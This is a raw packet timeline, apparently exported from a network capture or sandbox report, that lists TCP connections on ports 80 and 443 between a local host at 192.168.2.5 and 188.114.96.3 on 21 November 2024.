                                                                Nov 21, 2024 13:07:59.616573095 CET4970480192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:07:59.736200094 CET8049704188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:07:59.736305952 CET4970480192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:07:59.739715099 CET4970480192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:07:59.859311104 CET8049704188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:01.047128916 CET8049704188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:01.069900990 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:01.069946051 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:01.070028067 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:01.088766098 CET4970480192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:01.105720043 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:01.105756998 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:02.382292032 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:02.382426977 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:02.387835979 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:02.387846947 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:02.388240099 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:02.432487965 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:02.457309961 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:02.503328085 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:03.267797947 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:03.268065929 CET44349705188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:03.268141985 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:03.284890890 CET49705443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:03.537864923 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:03.537902117 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:03.537975073 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:03.538969994 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:03.538988113 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:04.850578070 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:04.850769997 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:04.853363037 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:04.853379965 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:04.853863955 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:04.855014086 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:04.895337105 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050370932 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050434113 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050472975 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050528049 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050575018 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050610065 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.050621986 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.050677061 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.058423042 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.066791058 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.066884041 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.066891909 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.075216055 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.075290918 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.075299025 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.120012999 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.169919014 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.213756084 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.213768959 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.260643959 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.260665894 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.264731884 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.264816999 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.264827013 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.276245117 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.276313066 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.276345968 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.276355028 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.276401997 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.284781933 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.293068886 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.293134928 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.293143988 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.301487923 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.301551104 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.301558971 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.310031891 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.310132980 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.310142994 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.316855907 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.316955090 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.316963911 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.323873043 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.323950052 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.323959112 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.337829113 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.337951899 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.337973118 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.337985039 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.338032961 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.344890118 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.351900101 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.351977110 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.351988077 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.401283026 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.470983982 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.474404097 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.474488974 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.474502087 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.479260921 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.479373932 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.479381084 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.484278917 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.484353065 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.484360933 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.484411955 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.493704081 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.493711948 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.493783951 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.503009081 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.503015995 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.503103971 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.512425900 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.512434006 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.512509108 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.517250061 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.517322063 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.526722908 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.526803017 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.531409025 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.531476974 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.540847063 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.540924072 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.550220966 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.550304890 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.559607029 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.559675932 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.564477921 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.564543962 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.573944092 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.574067116 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.683240891 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.683341026 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.688262939 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.688344955 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.691852093 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.691935062 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.698822975 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.698900938 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.705488920 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.705549002 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.712096930 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.712165117 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.716248989 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.716326952 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.722117901 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.722193003 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.728616953 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.728679895 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.735198021 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.735266924 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.738507986 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.738559961 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.745135069 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.745198011 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.748469114 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.748543024 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.755152941 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.755232096 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.761676073 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.761738062 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.766727924 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.766813993 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.773267984 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.773335934 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.779817104 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.779875994 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.783097982 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.783149004 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.789845943 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.789901972 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.793194056 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.793283939 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.892349958 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.892468929 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.893753052 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.893817902 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.899797916 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.899861097 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.905998945 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.906054974 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.911937952 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.912004948 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.915038109 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.915095091 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.921139956 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.921195984 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.937835932 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.937844992 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.937901020 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.937925100 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.937932014 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.937951088 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.937988043 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.948729992 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.948769093 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.948828936 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.948828936 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.948834896 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.948872089 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.963973045 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.963995934 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.964076042 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.964085102 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.964126110 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.978230000 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.978245974 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.978344917 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.978355885 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.978394985 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.993465900 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.993479967 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.993596077 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:10.993618011 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:10.993659973 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.008776903 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.008790016 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.008860111 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.008871078 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.008904934 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.108006001 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.108023882 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.108130932 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.108140945 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.108184099 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.122613907 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.122673035 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.122704029 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.122720003 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.122740984 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.122761011 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.136991978 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.137038946 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.137062073 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.137073040 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.137099981 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.137126923 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.147182941 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.147233009 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.147267103 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.147274017 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.147296906 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.147325993 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.156677008 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.156723976 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.156758070 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.156768084 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.156793118 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.156807899 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.165530920 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.165575981 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.165608883 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.165616035 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.165633917 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.165658951 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.175533056 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.175576925 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.175605059 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.175611019 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.175636053 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.175653934 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.185689926 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.185770988 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.185795069 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.185801983 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.185822010 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.185843945 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.316363096 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.316428900 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.316453934 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.316464901 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.316481113 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.316503048 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.324239016 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.324287891 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.324315071 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.324337959 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.324357033 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.324364901 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.332159996 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.332211018 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.332235098 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.332243919 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.332262039 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.332287073 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.340190887 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.340236902 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.340269089 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.340281963 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.340306997 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.340331078 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.347224951 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.347271919 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.347321033 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.347337008 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.347362041 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.347383976 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.355648041 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.355691910 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.355731010 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.355742931 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.355771065 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.355787992 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.362596035 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.362641096 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.362675905 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.362689018 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.362711906 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.362735033 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.370461941 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.370503902 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.370548964 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.370562077 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.370584965 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.370601892 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.527868986 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.527916908 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.527983904 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.528000116 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.528029919 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.528053999 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.534948111 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.534993887 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.535036087 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.535046101 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.535073996 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.535098076 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.542763948 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.542814016 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.542845011 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.542853117 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.542870045 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.542891979 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.550884962 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.550925970 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.550952911 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.550961971 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.550995111 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.551009893 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.557743073 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.557785988 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.557846069 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.557853937 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.557895899 CET49706443192.168.2.5188.114.96.3
